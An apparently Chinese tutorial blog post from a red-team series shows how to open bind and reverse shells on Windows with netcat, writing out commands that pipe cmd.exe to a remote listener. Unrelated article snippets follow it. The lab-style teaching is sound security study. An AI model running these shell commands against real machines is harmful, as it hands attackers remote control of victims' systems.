当前位置: 首页 > news >正文

《红蓝攻防对抗实战》六.常规反弹之利用NC在windows系统执行反弹shell

目录

一.利用NC工具在windows系统执行反弹shell

1. Windows正向连接shell

2.Windows反向连接shell


 前文推荐:

  • 《红蓝攻防对抗实战》一. 隧道穿透技术详解
  • 《红蓝攻防对抗实战》二.内网探测协议出网之TCP/UDP协议探测出网
  • 《红蓝攻防对抗实战》三.内网探测协议出网之HTTP/HTTPS协议探测出网
  • 《红蓝攻防对抗实战》四.内网探测协议出网之ICMP协议探测出网
  • 《红蓝攻防对抗实战》五.内网探测协议出网之DNS协议探测出网

假设在内网环境中发现主机,通过漏洞获取到该主机控制权限,想要进一步对内网环境进行后续利用,这里可以通过反弹shell的方式去进行穿透,本次实验以nc工具为例来演示不同系统的操作,实验拓扑如图1-1所示。

一.利用NC工具在windows系统执行反弹shell

图1-1 windows系统下实验拓扑图

1. Windows正向连接shell

本次实验环境如图1-1所示,假设已经获取到目标服务器的系统权限,上传nc工具,使用正向连接反弹shell的方法将目标服务器的shell反弹到本地主机。

1)首先在目标服务器执行nc.exe -lvp 8888 -e cmd.exe命令监听8888端口,使用-e参数将cmd.exe程序反弹连接到此端口的服务,开启监听执行成功后如图1-2所示。

图1-2 服务器开启监听

2)目标服务器执行监听后,在本地主机执行nc.exe 192.168.0.3 8888命令去连接目标服务器nc开启监听的端口,连接成功即可获取到目标服务器的shell权限,如图1-3所示。

图1-3  windwos主机获取反弹shell

2.Windows反向连接shell

本次实验环境如图1-1所示,在目标服务器允许出网的情况下,在本地主机上获取到目标服务器的shell权限,可以尝试使用反向连接的方法。

1)首先在本地主机中使用nc工具开启监听,执行nc.exe -lvp 8888命令,如图1-4所示。

图1-4 windows主机开启服务端监听

2)当本地主机开启监听后,在目标服务器执行nc.exe 192.168.0.2 8888 -e cmd"命令主动连接本地主机的8888端口将cmd命令反弹到目标服务器,如图1-5所示

图1-5 服务器连接主机

3)此时当目标服务器访问我们的本地8888端口时,即可执行获取到目标服务器的Shell权限,使用Ipconfig命令查看获取到的反弹shell的IP,可查看到是目标服务器,如图1-6所示。

图1-6 获取服务器反弹shell的IP

相关文章:

《红蓝攻防对抗实战》六.常规反弹之利用NC在windows系统执行反弹shell

目录 一.利用NC工具在windows系统执行反弹shell 1. Windows正向连接shell 2.Windows反向连接shell 前文推荐: 《红蓝攻防对抗实战》一. 隧道穿透技术详解《红蓝攻防对抗实战》二.内网探测协议出网之TCP/UDP协议探测出网《红蓝攻防对抗实战》三.内网探测协议出网…...

python如何创建自己的对冲交易算法

在这篇文章中,我解释了如何创建一个人工智能来每天为我进行自动交易。 随着机器学习的现代进步和在线数据的轻松访问,参与量化交易变得前所未有的容易。为了让事情变得更好,AWS 等云工具可以轻松地将交易想法转化为真正的、功能齐全的交易机器…...

Ubuntu22.04安装,SSH无法连接

Ubuntu初始化安装后,系统默认不允许root通过ssh连接,因此需要完成三个设置 1.修改ssh配置文件 vim /etc/ssh/sshd_config 将PermitRootLogin注释打开,并将值改为yes 保存修改并退出 :wq 2.重启ssh服务 sudo service ssh restart 3.重新打…...

解决dirsearch扫描工具pkg_resources模块警告问题

一、pkg_resources模块问题 ┌──(kali㉿kali)-[~/桌面/XXX/dirsearch-master] └─$ python dirsearch.py -h /home/kali/XX/XXXX/dirsearch-master/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io…...

JAVA-编程基础-11-04-java IO 字符流

Lison <dreamlison163.com>, v1.0.0, 2023.05.07 JAVA-编程基础-11-04-java IO 字符流 文章目录 JAVA-编程基础-11-04-java IO 字符流字符流Reader 和 Writer字符输入流&#xff08;Reader&#xff09;**FileReader构造方法****FileReader读取字符数据** 字符输出流&am…...

亚马逊云代码AI助手CodeWhisperer使用教程

一、CodeWhisperer 简介 1、CodeWhisperer是一款基于机器学习的通用代码生成器&#xff0c;由Amazon出品&#xff0c;可以给我们提供代码建议。 2、CodeWhisperer 基于各种上下文线索提供建议&#xff0c;包括光标在源代码中的位置、位于光标前面的代码、注释&#xff0c;以及…...

2023全新小程序广告流量主奖励发放系统源码 流量变现系统

2023全新小程序广告流量主奖励发放系统源码 流量变现系统 分享软件&#xff0c;吃瓜视频&#xff0c;或其他资源内容&#xff0c;通过用户付费买会员来变现&#xff0c;用户需要付费&#xff0c;有些人喜欢白嫖&#xff0c;所以会流失一部分用户&#xff0c;所以就写了这个系统…...

最详细STM32,cubeMX外部中断

这篇文章将详细介绍 cubeMX外部中断的配置&#xff0c;实现过程。 文章目录 前言一、外部中断的基础知识。二、cubeMX 配置外部中断三、自动生成的代码解析四、代码实现。总结 前言 实验开发板&#xff1a;STM32F103C8T6。所需软件&#xff1a;keil5 &#xff0c; cubeMX 。实…...

云栖大会?全部免费!!抢先一步看!

2023云栖大会定档10月31日&#xff01; 点击链接免费预约云栖门票&#xff1a; 2023云栖大会-领票页面 2023 云栖大会将于 10.31-11.2 在杭州云栖小镇举办&#xff0c;深度拥抱大数据AI 核心技术&#xff0c;见证阿里云大数据AI产品年度重磅发布及创新。开放融合的科技展示平…...

Linux常用的调试工具

在开发和调试Linux的过程中&#xff0c;经常会遇到各种各样的问题&#xff0c;如程序崩溃、性能低下、内存泄漏等。这时候&#xff0c;调试就显得尤为重要。调试技巧和工具能够帮助开发人员快速定位问题并快速解决。在本文中&#xff0c;我们将介绍一些常用的Linux调试技巧和工…...

PX4-Autopilot下载与编译

文章目录 1 Git clone 代码2 下载子模块3 编译4 可能遇到的问题参考 1 Git clone 代码 Github Repository 链接&#xff1a;PX4-Autopilot 查看现有版本&#xff1a; 在终端用命令下载&#xff0c;-b表示branch git clone -b v1.14.0 https://github.com/PX4/PX4-Autopilot.…...

关于数据可视化那些事

干巴巴的数据没人看&#xff0c;数据可视化才能直观展现数据要点&#xff0c;提升数据分析、数字化运营决策效率。那关于可视化的实现方式、技巧、工具等&#xff0c;你了解几分&#xff1f;接下来&#xff0c;我们就来聊聊数据可视化那些事。 1、什么是数据可视化&#xff1f…...

【Java小知识点】类加载器的区别

&#x1f384;欢迎来到边境矢梦的csdn博文&#x1f384; &#x1f384;本文主要梳理Java类加载器的区别&#x1f384; &#x1f308;我是边境矢梦&#xff0c;一个正在为秋招和算法竞赛做准备的学生&#x1f308; &#x1f386;喜欢的朋友可以关注一下&#x1faf0;&#x1faf…...

分布式微服务技术栈-SpringCloud<Eureka,Ribbon,nacos>

微服务技术栈 一、微服务 介绍了解1 架构结构案例与 springboot 兼容关系拆分案例拆分服务拆分-服务远程调用 2 eureka注册中心Eureka-提供者与消费者Eureka-eureka原理分析Eureka-搭建eureka服务Eureka-服务注册Eureka-服务发现 3 Ribbon组件 负载均衡Ribbon-负载均衡原理Ribb…...

Unity解决:导出AndroidStudio工程 出现如下报错的解决方法

unity2019.4+ androidStudio2023.x+ 问题1: cvc-complex-type.2.4.a: 发现了以元素 base-extension 开头的无效内容。应以 {layoutlib} 之一开头。 解决:第一个Build.gradle更改如下 // GENERATED BY UNITY. REMOVE THIS COMMENT TO PREVENT OVERWRITING WHEN EXPORTING …...

Mac电脑怎么在Dock窗口预览,Dock窗口预览工具DockView功能介绍

DockView是一款Mac电脑上的软件&#xff0c;它可以增强Dock的功能&#xff0c;让用户更方便地管理和切换应用程序。 DockView的主要功能是在 DockQ&#xff0c;栏上显示每个窗口的缩略图&#xff0c;并提供了一些相关的操作选项。当用户将鼠标悬停在Dock栏上的应用程序图标上时…...

Hadoop3教程(三十):(生产调优篇)纠删码

文章目录 &#xff08;155&#xff09;纠删码原理纠删码原理纠删码相关命令纠删码策略解释 &#xff08;156&#xff09;纠删码案例实操参考文献 &#xff08;155&#xff09;纠删码原理 纠删码原理 默认情况下&#xff0c;一个文件在HDFS里会保留3个副本&#xff0c;以此提高…...

用nodejs爬虫台湾痞客邦相册

情景:是这样的,我想保存一些喜欢的小伙伴的照片,一张张保存太慢了, 所以我写了个js,放在国外服务器爬,国内的自己解决~ 使用方法 1.点相册随便一张, 复制url, 这张开始接下来的图片都会保存 /*** 2023年10月23日 22:58:44* 支持解析痞客邦相册* 只需要复制相册第一张图片的ur…...

物联网_01_物理设备的网络接入

设备的网络接入及物理层使用到的传输协议 现在物理设备有两种接入方式,一种是直接接入另一种是网关接入 直接接入 给物理设备添加NB-IOT通信模组等设备使之具有直接接入网络的能力 网关接入 物理设备在本地组网后通过统一的网关接入到网络(ZigBee无线组网网关).网关是处在本地…...

AD9371 官方例程之 tx_jesd 与 xcvr接口映射

AD9371 系列快速入口 AD9371ZCU102 移植到 ZCU106 &#xff1a; AD9371 官方例程构建及单音信号收发 AD9371 官方例程 时钟间的关系与生成 &#xff1a; AD9371 官方例程HDL详解之JESD204B TX侧时钟生成&#xff08;一&#xff09; AD9371 官方例程 时钟间的关系与生成 &…...

OpenClaw技能库怎么用?从获取、下载到添加使用一篇讲清

OpenClaw技能库怎么用&#xff1f;从获取、下载到添加使用一篇讲清 关键词&#xff1a;openclaw技能库、OpenClaw技能库、OpenClaw Skill、OpenClaw教程、AI智能体、EasyClaw 摘要 很多人开始接触 OpenClaw 后&#xff0c;真正卡住的往往不是“听不懂概念”&#xff0c;而是…...

从 0 到 1 搭建基于 AutoGen 的多智能体群聊系统

从 0 到 1 搭建基于 AutoGen 的多智能体群聊系统:解锁 AI 协作的无限可能 关键词 AutoGen多智能体框架、LLM群聊、Agent协作模式、工具调用链、代码执行沙箱、自动任务拆解、群聊编排策略 摘要 想象一下:你有一个由AI“程序员”、“测试工程师”、“产品经理”、“UI设计师…...

终极鸣潮自动化指南:如何用OK-WW轻松实现后台自动战斗与声骸刷取

终极鸣潮自动化指南&#xff1a;如何用OK-WW轻松实现后台自动战斗与声骸刷取 【免费下载链接】ok-wuthering-waves 鸣潮 后台自动战斗 自动刷声骸 一键日常 Automation for Wuthering Waves 项目地址: https://gitcode.com/GitHub_Trending/ok/ok-wuthering-waves 作为《…...

“你用AI,那我也会用AI,我还要你干什么?”罕

这个代码的核心功能是&#xff1a;基于输入词的长度动态选择反义词示例&#xff0c;并调用大模型生成反义词&#xff0c;体现了 “动态少样本提示&#xff08;Dynamic Few-Shot Prompting&#xff09;” 与 “上下文长度感知的示例选择” 的能力。 from langchain.prompts impo…...

论文阅读:arxiv 2026 Uncovering Security Threats and Architecting Defenses in Autonomous Agents: A Case S

总目录 大模型安全研究论文整理 2026年版&#xff1a;https://blog.csdn.net/WhiffeYF/article/details/159047894 Uncovering Security Threats and Architecting Defenses in Autonomous Agents: A Case Study of OpenClaw https://arxiv.org/abs/2603.12644 该论文《Uncov…...

告别“权限不足”:手把手教你用CobaltStrike的Bypass UAC功能搞定Windows提权

实战指南&#xff1a;利用CobaltStrike突破Windows权限限制 当你手握一个普通用户权限的Beacon会话&#xff0c;却卡在"请求的操作需要提升"的提示前&#xff0c;这种挫败感每个渗透测试员都深有体会。Windows的用户账户控制(UAC)就像一堵无形的墙&#xff0c;将普通…...

Verdi 快速上手:信号追踪与波形调试实战

1. Verdi工具入门&#xff1a;数字IC调试的瑞士军刀 刚接触数字IC设计时&#xff0c;最让我头疼的就是仿真波形调试。密密麻麻的信号线像一团乱麻&#xff0c;根本不知道从哪里下手。直到同事推荐了Verdi&#xff0c;这个被业界称为"调试神器"的工具彻底改变了我的工…...

代码审计 | Log4j2 —— CVE-2021-44228 JNDI 注入与递归解析的完整链路分析

代码审计 | Log4j2 —— CVE-2021-44228 JNDI 注入与递归解析的完整链路分析 目录 环境搭建 漏洞复现 编写测试代码 构造恶意 class 文件 启动 LDAP 转发器 请求流程 使用 JNDI 工具一键利用 代码审计 payload 入口追踪 MessagePatternConverter:关键转折点 substitu…...

嵌入式程序main()退出处理机制与优化实践

1. 嵌入式程序执行的生命周期解析在裸机嵌入式开发中&#xff0c;程序执行流程与通用计算机存在本质差异。以8051架构为例&#xff0c;当开发者在Keil环境下编写一个简单的LED控制程序时&#xff0c;完整的执行链条包含以下几个关键阶段&#xff1a;硬件复位阶段&#xff08;0x…...

ESP32S3 驱动MAX98357 I2S 音频播放:从SD卡解码MP3到实时输出的全链路解析

1. ESP32S3与MAX98357音频系统架构解析 把ESP32S3和MAX98357比作一支配合默契的乐队&#xff0c;前者是指挥家兼作曲家&#xff0c;后者则是实力派主唱。ESP32S3通过I2S协议将数字乐谱传递给MAX98357&#xff0c;这位"主唱"就能把数字符号转化为动人的旋律。这套组合…...